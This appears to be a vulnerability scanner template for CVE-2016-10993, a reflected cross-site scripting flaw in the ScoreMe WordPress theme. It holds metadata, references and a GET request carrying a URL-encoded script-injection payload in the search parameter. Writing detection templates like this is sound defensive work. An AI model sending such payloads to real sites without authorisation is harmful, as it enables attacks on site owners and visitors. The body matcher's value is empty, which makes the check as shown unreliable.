id: CVE-2016-10993 info: name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium description: The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter. reference: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 - https://wpvulndb.com/vulnerabilities/8431 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2016-10993 cwe-id: CWE-79 tags: cve,cve2016,wordpress,wp-theme,xss requests: - method: GET path: - "{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - '' part: body - type: word part: header words: - text/html - type: status status: - 200